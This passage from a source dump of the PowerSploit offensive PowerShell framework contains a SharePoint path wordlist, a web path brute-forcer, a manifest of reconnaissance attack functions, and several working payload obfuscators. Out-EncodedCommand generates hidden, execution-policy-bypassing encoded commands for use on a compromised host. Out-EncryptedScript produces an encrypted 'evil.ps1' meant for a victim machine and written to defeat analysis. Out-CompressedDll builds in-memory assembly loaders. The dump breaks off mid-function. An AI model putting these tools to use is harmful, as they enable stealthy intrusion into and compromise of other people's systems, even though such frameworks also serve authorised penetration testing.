29 | _layouts/mobile/mbllists.aspx
30 | _layouts/MyInfo.aspx
31 | _layouts/MyPage.aspx
32 | _layouts/MyTasks.aspx
33 | _layouts/navoptions.aspx
34 | _layouts/NewDwp.aspx
35 | _layouts/newgrp.aspx
36 | _layouts/newsbweb.aspx
37 | _layouts/PageSettings.aspx
38 | _layouts/people.aspx
39 | _layouts/people.aspx?MembershipGroupId=0
40 | _layouts/permsetup.aspx
41 | _layouts/picker.aspx
42 | _layouts/policy.aspx
43 | _layouts/policyconfig.aspx
44 | _layouts/policycts.aspx
45 | _layouts/Policylist.aspx
46 | _layouts/prjsetng.aspx
47 | _layouts/quiklnch.aspx
48 | _layouts/recyclebin.aspx
49 | _Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
50 | _layouts/role.aspx
51 | _layouts/settings.aspx
52 | _layouts/SiteDirectorySettings.aspx
53 | _layouts/sitemanager.aspx
54 | _Layouts/SiteManager.aspx?lro=all
55 | _layouts/spcf.aspx
56 | _layouts/storman.aspx
57 | _layouts/themeweb.aspx
58 | _layouts/topnav.aspx
59 | _layouts/user.aspx
60 | _layouts/userdisp.aspx
61 | _layouts/userdisp.aspx?ID=1
62 | _layouts/useredit.aspx
63 | _layouts/useredit.aspx?ID=1&Source=%2F%5Flayouts%2Fpeople%2Easpx
64 | _layouts/viewgrouppermissions.aspx
65 | _layouts/viewlsts.aspx
66 | _layouts/vsubwebs.aspx
67 | _layouts/WPPrevw.aspx?ID=247
68 | _layouts/wrkmng.aspx
69 | _vti_bin/Admin.asmx
70 | _vti_bin/alerts.asmx
71 | _vti_bin/dspsts.asmx
72 | _vti_bin/forms.asmx
73 | _vti_bin/Lists.asmx
74 | _vti_bin/people.asmx
75 | _vti_bin/Permissions.asmx
76 | _vti_bin/search.asmx
77 | _vti_bin/UserGroup.asmx
78 | _vti_bin/versions.asmx
79 | _vti_bin/Views.asmx
80 | _vti_bin/webpartpages.asmx
81 | _vti_bin/webs.asmx
82 | _vti_bin/spsdisco.aspx
83 | _vti_bin/AreaService.asmx
84 | _vti_bin/BusinessDataCatalog.asmx
85 | _vti_bin/ExcelService.asmx
86 | _vti_bin/SharepointEmailWS.asmx
87 | _vti_bin/spscrawl.asmx
88 | _vti_bin/spsearch.asmx
89 | _vti_bin/UserProfileService.asmx
90 | _vti_bin/WebPartPages.asmx
91 | default.aspx
92 | Forms/DispForm.aspx
93 | Forms/DispForm.aspx?ID=1
94 | Forms/EditForm.aspx
95 | Forms/EditForm.aspx?ID=1
96 | Forms/Forms/AllItems.aspx
97 | Forms/MyItems.aspx
98 | Forms/NewForm.aspx
99 | Pages/default.aspx
100 | Pages/Forms/AllItems.aspx
101 | shared documents/forms/allitems.aspx
--------------------------------------------------------------------------------
/Recon/Get-HttpStatus.ps1:
--------------------------------------------------------------------------------
1 | function Get-HttpStatus
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Returns the HTTP Status Codes and full URL for specified paths.
7 |
8 | PowerSploit Function: Get-HttpStatus
9 | Author: Chris Campbell (@obscuresec)
10 | License: BSD 3-Clause
11 | Required Dependencies: None
12 | Optional Dependencies: None
13 |
14 | .DESCRIPTION
15 |
16 | A script to check for the existence of a path or file on a webserver.
17 |
18 | .PARAMETER Target
19 |
20 | Specifies the remote web host either by IP or hostname.
21 |
22 | .PARAMETER Path
23 |
24 | Specifies the remost host.
25 |
26 | .PARAMETER Port
27 |
28 | Specifies the port to connect to.
29 |
30 | .PARAMETER UseSSL
31 |
32 | Use an SSL connection.
33 |
34 | .EXAMPLE
35 |
36 | C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*}
37 |
38 | .EXAMPLE
39 |
40 | C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL
41 |
42 | .NOTES
43 |
44 | HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error
45 |
46 | .LINK
47 |
48 | http://obscuresecurity.blogspot.com
49 | http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
50 | #>
51 |
52 | [CmdletBinding()] Param(
53 | [Parameter(Mandatory = $True)]
54 | [String]
55 | $Target,
56 |
57 | [String]
58 | [ValidateNotNullOrEmpty()]
59 | $Path = '.\Dictionaries\admin.txt',
60 |
61 | [Int]
62 | $Port,
63 |
64 | [Switch]
65 | $UseSSL
66 | )
67 |
68 | if (Test-Path $Path) {
69 |
70 | if ($UseSSL -and $Port -eq 0) {
71 | # Default to 443 if SSL is specified but no port is specified
72 | $Port = 443
73 | } elseif ($Port -eq 0) {
74 | # Default to port 80 if no port is specified
75 | $Port = 80
76 | }
77 |
78 | $TcpConnection = New-Object System.Net.Sockets.TcpClient
79 | Write-Verbose "Path Test Succeeded - Testing Connectivity"
80 |
81 | try {
82 | # Validate that the host is listening before scanning
83 | $TcpConnection.Connect($Target, $Port)
84 | } catch {
85 | Write-Error "Connection Test Failed - Check Target"
86 | $Tcpconnection.Close()
87 | Return
88 | }
89 |
90 | $Tcpconnection.Close()
91 | } else {
92 | Write-Error "Path Test Failed - Check Dictionary Path"
93 | Return
94 | }
95 |
96 | if ($UseSSL) {
97 | $SSL = 's'
98 | # Ignore invalid SSL certificates
99 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }
100 | } else {
101 | $SSL = ''
102 | }
103 |
104 | if (($Port -eq 80) -or ($Port -eq 443)) {
105 | $PortNum = ''
106 | } else {
107 | $PortNum = ":$Port"
108 | }
109 |
110 | # Check Http status for each entry in the doctionary file
111 | foreach ($Item in Get-Content $Path) {
112 |
113 | $WebTarget = "http$($SSL)://$($Target)$($PortNum)/$($Item)"
114 | $URI = New-Object Uri($WebTarget)
115 |
116 | try {
117 | $WebRequest = [System.Net.WebRequest]::Create($URI)
118 | $WebResponse = $WebRequest.GetResponse()
119 | $WebStatus = $WebResponse.StatusCode
120 | $ResultObject += $ScanObject
121 | $WebResponse.Close()
122 | } catch {
123 | $WebStatus = $Error[0].Exception.InnerException.Response.StatusCode
124 |
125 | if ($WebStatus -eq $null) {
126 | # Not every exception returns a StatusCode.
127 | # If that is the case, return the Status.
128 | $WebStatus = $Error[0].Exception.InnerException.Status
129 | }
130 | }
131 |
132 | $Result = @{ Status = $WebStatus;
133 | URL = $WebTarget}
134 |
135 | $ScanObject = New-Object -TypeName PSObject -Property $Result
136 |
137 | Write-Output $ScanObject
138 |
139 | }
140 | }
141 |
--------------------------------------------------------------------------------
/Recon/Recon.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Recon.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber', 'Will Schroeder'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Reconnaissance Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = @(
26 | 'Add-NetGroupUser',
27 | 'Add-NetUser',
28 | 'Add-ObjectAcl',
29 | 'Convert-NameToSid',
30 | 'Convert-SidToName',
31 | 'Convert-ADName',
32 | 'ConvertFrom-UACValue',
33 | 'Export-PowerViewCSV',
34 | 'Find-ComputerField',
35 | 'Find-ForeignGroup',
36 | 'Find-ForeignUser',
37 | 'Find-GPOComputerAdmin',
38 | 'Find-GPOLocation',
39 | 'Find-InterestingFile',
40 | 'Find-LocalAdminAccess',
41 | 'Find-ManagedSecurityGroups',
42 | 'Find-UserField',
43 | 'Get-ADObject',
44 | 'Get-CachedRDPConnection',
45 | 'Get-ComputerDetails',
46 | 'Get-ComputerProperty',
47 | 'Get-DFSshare',
48 | 'Get-DNSRecord',
49 | 'Get-DNSZone',
50 | 'Get-DomainPolicy',
51 | 'Get-DomainSID',
52 | 'Get-ExploitableSystem',
53 | 'Get-GUIDMap',
54 | 'Get-HttpStatus',
55 | 'Get-IPAddress',
56 | 'Get-LastLoggedOn',
57 | 'Get-LoggedOnLocal',
58 | 'Get-NetComputer',
59 | 'Get-NetDomain',
60 | 'Get-NetDomainController',
61 | 'Get-NetDomainTrust',
62 | 'Get-NetFileServer',
63 | 'Get-NetForest',
64 | 'Get-NetForestCatalog',
65 | 'Get-NetForestDomain',
66 | 'Get-NetForestTrust',
67 | 'Get-NetGPO',
68 | 'Get-NetGPOGroup',
69 | 'Get-NetGroup',
70 | 'Get-NetGroupMember',
71 | 'Get-NetLocalGroup',
72 | 'Get-NetLoggedon',
73 | 'Get-NetOU',
74 | 'Get-NetProcess',
75 | 'Get-NetRDPSession',
76 | 'Get-NetSession',
77 | 'Get-NetShare',
78 | 'Get-NetSite',
79 | 'Get-NetSubnet',
80 | 'Get-NetUser',
81 | 'Get-ObjectAcl',
82 | 'Get-PathAcl',
83 | 'Get-Proxy',
84 | 'Get-RegistryMountedDrive',
85 | 'Get-SiteName',
86 | 'Get-UserEvent',
87 | 'Get-UserProperty',
88 | 'Invoke-ACLScanner',
89 | 'Invoke-CheckLocalAdminAccess',
90 | 'Invoke-DowngradeAccount',
91 | 'Invoke-EnumerateLocalAdmin',
92 | 'Invoke-EventHunter',
93 | 'Invoke-FileFinder',
94 | 'Invoke-MapDomainTrust',
95 | 'Invoke-Portscan',
96 | 'Invoke-ProcessHunter',
97 | 'Invoke-ReverseDnsLookup',
98 | 'Invoke-ShareFinder',
99 | 'Invoke-UserHunter',
100 | 'New-GPOImmediateTask',
101 | 'Request-SPNTicket',
102 | 'Set-ADObject'
103 | )
104 |
105 | # List of all files packaged with this module
106 | FileList = 'Recon.psm1', 'Recon.psd1', 'PowerView.ps1', 'Get-HttpStatus.ps1', 'Invoke-ReverseDnsLookup.ps1',
107 | 'Invoke-Portscan.ps1', 'Get-ComputerDetails.ps1', 'README.md'
108 |
109 | }
110 |
--------------------------------------------------------------------------------
/Recon/Recon.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/ScriptModification/Out-CompressedDll.ps1:
--------------------------------------------------------------------------------
1 | function Out-CompressedDll
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
7 |
8 | PowerSploit Function: Out-CompressedDll
9 | Author: Matthew Graeber (@mattifestation)
10 | License: BSD 3-Clause
11 | Required Dependencies: None
12 | Optional Dependencies: None
13 |
14 | .DESCRIPTION
15 |
16 | Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.
17 |
18 | .PARAMETER FilePath
19 |
20 | Specifies the path to a managed executable.
21 |
22 | .EXAMPLE
23 |
24 | C:\PS> Out-CompressedDll -FilePath evil.dll
25 |
26 | Description
27 | -----------
28 | Compresses, base64 encodes, and outputs the code required to load evil.dll in memory.
29 |
30 | .NOTES
31 |
32 | Only pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it just works' - mixed-mode) dlls will not load.
33 |
34 | .LINK
35 |
36 | http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html
37 | #>
38 |
39 | [CmdletBinding()] Param (
40 | [Parameter(Mandatory = $True)]
41 | [String]
42 | $FilePath
43 | )
44 |
45 | $Path = Resolve-Path $FilePath
46 |
47 | if (! [IO.File]::Exists($Path))
48 | {
49 | Throw "$Path does not exist."
50 | }
51 |
52 | $FileBytes = [System.IO.File]::ReadAllBytes($Path)
53 |
54 | if (($FileBytes[0..1] | % {[Char]$_}) -join '' -cne 'MZ')
55 | {
56 | Throw "$Path is not a valid executable."
57 | }
58 |
59 | $Length = $FileBytes.Length
60 | $CompressedStream = New-Object IO.MemoryStream
61 | $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
62 | $DeflateStream.Write($FileBytes, 0, $FileBytes.Length)
63 | $DeflateStream.Dispose()
64 | $CompressedFileBytes = $CompressedStream.ToArray()
65 | $CompressedStream.Dispose()
66 | $EncodedCompressedFile = [Convert]::ToBase64String($CompressedFileBytes)
67 |
68 | Write-Verbose "Compression ratio: $(($EncodedCompressedFile.Length/$FileBytes.Length).ToString('#%'))"
69 |
70 | $Output = @"
71 | `$EncodedCompressedFile = @'
72 | $EncodedCompressedFile
73 | '@
74 | `$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`$EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)
75 | `$UncompressedFileBytes = New-Object Byte[]($Length)
76 | `$DeflatedStream.Read(`$UncompressedFileBytes, 0, $Length) | Out-Null
77 | [Reflection.Assembly]::Load(`$UncompressedFileBytes)
78 | "@
79 |
80 | Write-Output $Output
81 | }
82 |
--------------------------------------------------------------------------------
/ScriptModification/Out-EncodedCommand.ps1:
--------------------------------------------------------------------------------
1 | function Out-EncodedCommand
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
7 |
8 | PowerSploit Function: Out-EncodedCommand
9 | Author: Matthew Graeber (@mattifestation)
10 | License: BSD 3-Clause
11 | Required Dependencies: None
12 | Optional Dependencies: None
13 |
14 | .DESCRIPTION
15 |
16 | Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt. The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload. This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies.
17 |
18 | .PARAMETER ScriptBlock
19 |
20 | Specifies a scriptblock containing your payload.
21 |
22 | .PARAMETER Path
23 |
24 | Specifies the path to your payload.
25 |
26 | .PARAMETER NoExit
27 |
28 | Outputs the option to not exit after running startup commands.
29 |
30 | .PARAMETER NoProfile
31 |
32 | Outputs the option to not load the Windows PowerShell profile.
33 |
34 | .PARAMETER NonInteractive
35 |
36 | Outputs the option to not present an interactive prompt to the user.
37 |
38 | .PARAMETER Wow64
39 |
40 | Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations.
41 |
42 | .PARAMETER WindowStyle
43 |
44 | Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden.
45 |
46 | .PARAMETER EncodedOutput
47 |
48 | Base-64 encodes the entirety of the output. This is usually unnecessary and effectively doubles the size of the output. This option is only for those who are extra paranoid.
49 |
50 | .EXAMPLE
51 |
52 | C:\PS> Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'}
53 |
54 | powershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()
55 |
56 | .EXAMPLE
57 |
58 | C:\PS> Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput
59 |
60 | powershell -NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcATABjAGkAeABDAHMASQB3AEUAQQBEAFEAWAAzAEUASQBWAEkAYwBtAEwAaQA1AEsAawBGAEsARQA2AGwAQgBCAFIAWABDADgAaABLAE8ATgBwAEwAawBRAEwANAAzACsAdgBRAGgAdQBqAHkAZABBADkAMQBqAHEAcwAzAG0AaQA1AFUAWABkADAAdgBUAG4ATQBUAEMAbQBnAEgAeAA0AFIAMAA4AEoAawAyAHgAaQA5AE0ANABDAE8AdwBvADcAQQBmAEwAdQBYAHMANQA0ADEATwBLAFcATQB2ADYAaQBoADkAawBOAHcATABpAHMAUgB1AGEANABWAGEAcQBVAEkAagArAFUATwBSAHUAVQBsAGkAWgBWAGcATwAyADQAbgB6AFYAMQB3ACsAWgA2AGUAbAB5ADYAWgBsADIAdAB2AGcAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=
61 |
62 | Description
63 | -----------
64 | Execute the above payload for the lulz. >D
65 |
66 | .NOTES
67 |
68 | This cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kennedy and Josh Kelley's talk, "PowerShell...OMFG" (https://www.trustedsec.com/files/PowerShell_PoC.zip)
69 |
70 | .LINK
71 |
72 | http://www.exploit-monday.com
73 | #>
74 |
75 | [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param (
76 | [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )]
77 | [ValidateNotNullOrEmpty()]
78 | [ScriptBlock]
79 | $ScriptBlock,
80 |
81 | [Parameter(Position = 0, ParameterSetName = 'FilePath' )]
82 | [ValidateNotNullOrEmpty()]
83 | [String]
84 | $Path,
85 |
86 | [Switch]
87 | $NoExit,
88 |
89 | [Switch]
90 | $NoProfile,
91 |
92 | [Switch]
93 | $NonInteractive,
94 |
95 | [Switch]
96 | $Wow64,
97 |
98 | [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')]
99 | [String]
100 | $WindowStyle,
101 |
102 | [Switch]
103 | $EncodedOutput
104 | )
105 |
106 | if ($PSBoundParameters['Path'])
107 | {
108 | Get-ChildItem $Path -ErrorAction Stop | Out-Null
109 | $ScriptBytes = [IO.File]::ReadAllBytes((Resolve-Path $Path))
110 | }
111 | else
112 | {
113 | $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($ScriptBlock)
114 | }
115 |
116 | $CompressedStream = New-Object IO.MemoryStream
117 | $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
118 | $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
119 | $DeflateStream.Dispose()
120 | $CompressedScriptBytes = $CompressedStream.ToArray()
121 | $CompressedStream.Dispose()
122 | $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
123 |
124 | # Generate the code that will decompress and execute the payload.
125 | # This code is intentionally ugly to save space.
126 | $NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
127 |
128 | # Base-64 strings passed to -EncodedCommand must be unicode encoded.
129 | $UnicodeEncoder = New-Object System.Text.UnicodeEncoding
130 | $EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))
131 |
132 | # Build the command line options
133 | # Use the shortest possible command-line arguments to save space. Thanks @obscuresec for the idea.
134 | $CommandlineOptions = New-Object String[](0)
135 | if ($PSBoundParameters['NoExit'])
136 | { $CommandlineOptions += '-NoE' }
137 | if ($PSBoundParameters['NoProfile'])
138 | { $CommandlineOptions += '-NoP' }
139 | if ($PSBoundParameters['NonInteractive'])
140 | { $CommandlineOptions += '-NonI' }
141 | if ($PSBoundParameters['WindowStyle'])
142 | { $CommandlineOptions += "-W $($PSBoundParameters['WindowStyle'])" }
143 |
144 | $CmdMaxLength = 8190
145 |
146 | # Build up the full command-line string. Default to outputting a fully base-64 encoded command.
147 | # If the fully base-64 encoded output exceeds the cmd.exe character limit, fall back to partial
148 | # base-64 encoding to save space. Thanks @Carlos_Perez for the idea.
149 | if ($PSBoundParameters['Wow64'])
150 | {
151 | $CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -C `"$NewScript`""
152 |
153 | if ($PSBoundParameters['EncodedOutput'] -or $CommandLineOutput.Length -le $CmdMaxLength)
154 | {
155 | $CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -E `"$EncodedPayloadScript`""
156 | }
157 |
158 | if (($CommandLineOutput.Length -gt $CmdMaxLength) -and (-not $PSBoundParameters['EncodedOutput']))
159 | {
160 | $CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -C `"$NewScript`""
161 | }
162 | }
163 | else
164 | {
165 | $CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -C `"$NewScript`""
166 |
167 | if ($PSBoundParameters['EncodedOutput'] -or $CommandLineOutput.Length -le $CmdMaxLength)
168 | {
169 | $CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -E `"$EncodedPayloadScript`""
170 | }
171 |
172 | if (($CommandLineOutput.Length -gt $CmdMaxLength) -and (-not $PSBoundParameters['EncodedOutput']))
173 | {
174 | $CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -C `"$NewScript`""
175 | }
176 | }
177 |
178 | if ($CommandLineOutput.Length -gt $CmdMaxLength)
179 | {
180 | Write-Warning 'This command exceeds the cmd.exe maximum allowed length!'
181 | }
182 |
183 | Write-Output $CommandLineOutput
184 | }
185 |
--------------------------------------------------------------------------------
/ScriptModification/Out-EncryptedScript.ps1:
--------------------------------------------------------------------------------
1 | function Out-EncryptedScript
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Encrypts text files/scripts.
7 |
8 | PowerSploit Function: Out-EncryptedScript
9 | Author: Matthew Graeber (@mattifestation)
10 | License: BSD 3-Clause
11 | Required Dependencies: None
12 | Optional Dependencies: None
13 |
14 | .DESCRIPTION
15 |
16 | Out-EncryptedScript will encrypt a script (or any text file for that
17 | matter) and output the results to a minimally obfuscated script -
18 | evil.ps1 by default.
19 |
20 | .PARAMETER ScriptPath
21 |
22 | Path to this script
23 |
24 | .PARAMETER Password
25 |
26 | Password to encrypt/decrypt the script
27 |
28 | .PARAMETER Salt
29 |
30 | Salt value for encryption/decryption. This can be any string value.
31 |
32 | .PARAMETER InitializationVector
33 |
34 | Specifies a 16-character the initialization vector to be used. This
35 | is randomly generated by default.
36 |
37 | .EXAMPLE
38 |
39 | C:\PS> Out-EncryptedScript .\Naughty-Script.ps1 password salty
40 |
41 | Description
42 | -----------
43 | Encrypt the contents of this file with a password and salt. This will
44 | make analysis of the script impossible without the correct password
45 | and salt combination. This command will generate evil.ps1 that can
46 | dropped onto the victim machine. It only consists of a decryption
47 | function 'de' and the base64-encoded ciphertext.
48 |
49 | .EXAMPLE
50 |
51 | C:\PS> [String] $cmd = Get-Content .\evil.ps1
52 | C:\PS> Invoke-Expression $cmd
53 | C:\PS> $decrypted = de password salt
54 | C:\PS> Invoke-Expression $decrypted
55 |
56 | Description
57 | -----------
58 | This series of instructions assumes you've already encrypted a script
59 | and named it evil.ps1. The contents are then decrypted and the
60 | unencrypted script is called via Invoke-Expression
61 |
62 | .NOTES
63 |
64 | This command can be used to encrypt any text-based file/script
65 | #>
66 |
67 | [CmdletBinding()] Param (
68 | [Parameter(Position = 0, Mandatory = $True)]
69 | [String]
70 | $ScriptPath,
71 |
72 | [Parameter(Position = 1, Mandatory = $True)]
73 | [String]
74 | $Password,
75 |
76 | [Parameter(Position = 2, Mandatory = $True)]
77 | [String]
78 | $Salt,
79 |
80 | [Parameter(Position = 3)]
81 | [ValidateLength(16, 16)]
82 | [String]
83 | $InitializationVector = ((1..16 | % {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join ''),
84 |
85 | [Parameter(Position = 4)]
86 | [String]
87 | $FilePath = '.\evil.ps1'
88 | )
89 |
90 | $AsciiEncoder = New-Object System.Text.ASCIIEncoding
91 | $ivBytes = $AsciiEncoder.GetBytes($InitializationVector)
92 | # While this can be used to encrypt any file, it's primarily designed to encrypt itself.
93 | [Byte[]] $scriptBytes = Get-Content -Encoding Byte -ReadCount 0 -Path $ScriptPath
94 | $DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($Password, $AsciiEncoder.GetBytes($Salt), "SHA1", 2)
95 | $Key = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider
96 | $Key.Mode = [System.Security.Cryptography.CipherMode]::CBC
97 | [Byte[]] $KeyBytes = $DerivedPass.GetBytes(16)
98 | $Encryptor = $Key.CreateEncryptor($KeyBytes, $ivBytes)
99 | $MemStream = New-Object System.IO.MemoryStream
100 | $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($MemStream, $Encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
101 | $CryptoStream.Write($scriptBytes, 0, $scriptBytes.Length)
102 | $CryptoStream.FlushFinalBlock()
103 | $CipherTextBytes = $MemStream.ToArray()
104 | $MemStream.Close()
105 | $CryptoStream.Close()
106 | $Key.Clear()
107 | $Cipher = [Convert]::ToBase64String($CipherTextBytes)
108 |
109 | # Generate encrypted PS1 file. All that will be included is the base64-encoded ciphertext and a slightly 'obfuscated' decrypt function
110 | $Output = @"
111 | function de([String] `$b, [String] `$c)
112 | {
113 | `$a = "$Cipher";
114 | `$encoding = New-Object System.Text.ASCIIEncoding;
115 | `$dd = `$encoding.GetBytes("$InitializationVector");
116 | `$aa = [Convert]::FromBase64String(`$a);
117 | `$derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes(`$b, `$encoding.GetBytes(`$c), "SHA1", 2);
118 | [Byte[]] `$e = `$derivedPass.GetBytes(16);
119 | `$f = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider;
120 | `$f.Mode = [System.Security.Cryptography.CipherMode]::CBC;
121 | [Byte[]] `$h = New-Object Byte[](`$aa.Length);
122 | `$g = `$f.CreateDecryptor(`$e, `$dd);
123 | `$i = New-Object System.IO.MemoryStream(`$aa, `$True);
124 | `$j = New-Object System.Security.Cryptography.CryptoStream(`$i, `$g, [System.Security.Cryptography.CryptoStreamMode]::Read);
125 | `$r = `$j.Read(`$h, 0, `$h.Length);
126 | `$i.Close();
127 | `$j.Close();
128 | `$f.Clear();
129 | if ((`$h.Length -gt 3) -and (`$h[0] -eq 0xEF) -and (`$h[1] -eq 0xBB) -and (`$h[2] -eq 0xBF)) { `$h = `$h[3..(`$h.Length-1)]; }
130 | return `$encoding.GetString(`$h).TrimEnd([Char] 0);
131 | }
132 | "@
133 |
134 | # Output decrypt function and ciphertext to evil.ps1
135 | Out-File -InputObject $Output -Encoding ASCII $FilePath
136 |
137 | Write-Verbose "Encrypted PS1 file saved to: $(Resolve-Path $FilePath)"
138 | }
139 |
--------------------------------------------------------------------------------
/ScriptModification/Remove-Comments.ps1:
--------------------------------------------------------------------------------
1 | function Remove-Comments
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Strips comments and extra whitespace from a script.
7 |
8 | PowerSploit Function: Remove-Comments
9 | Author: Matthew Graeber (@mattifestation)
10 | License: BSD 3-Clause
11 | Required Dependencies: None
12 | Optional Dependencies: None
13 |
14 | .DESCRIPTION
15 |
16 | Remove-Comments strips out comments and unnecessary whitespace from a script. This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.
17 |
18 | A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. You rock, Lee!
19 |
20 | .PARAMETER ScriptBlock
21 |
22 | Specifies a scriptblock containing your script.
23 |
24 | .PARAMETER Path
25 |
26 | Specifies the path to your script.
27 |
28 | .EXAMPLE
29 |
30 | C:\PS> $Stripped = Remove-Comments -Path .\ScriptWithComments.ps1
31 |
32 | .EXAMPLE
33 |
34 | C:\PS> Remove-Comments -ScriptBlock {
35 | ### This is my awesome script. My documentation is beyond reproach!
36 | Write-Host 'Hello, World!' ### Write 'Hello, World' to the host
37 | ### End script awesomeness
38 | }
39 |
40 | Write-Host 'Hello, World!'
41 |
42 | .EXAMPLE
43 |
44 | C:\PS> Remove-Comments -Path Inject-Shellcode.ps1 | Out-EncodedCommand
45 |
46 | Description
47 | -----------
48 | Removes extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand.
49 |
50 | .INPUTS
51 |
52 | System.String, System.Management.Automation.ScriptBlock
53 |
54 | Accepts either a string containing the path to a script or a scriptblock.
55 |
56 | .OUTPUTS
57 |
58 | System.Management.Automation.ScriptBlock
59 |
60 | Remove-Comments returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired.
61 |
62 | .LINK
63 |
64 | http://www.exploit-monday.com
65 | http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/
66 | #>
67 |
68 | [CmdletBinding( DefaultParameterSetName = 'FilePath' )] Param (
69 | [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'FilePath' )]
70 | [ValidateNotNullOrEmpty()]
71 | [String]
72 | $Path,
73 |
74 | [Parameter(Position = 0, ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ScriptBlock' )]
75 | [ValidateNotNullOrEmpty()]
76 | [ScriptBlock]
77 | $ScriptBlock
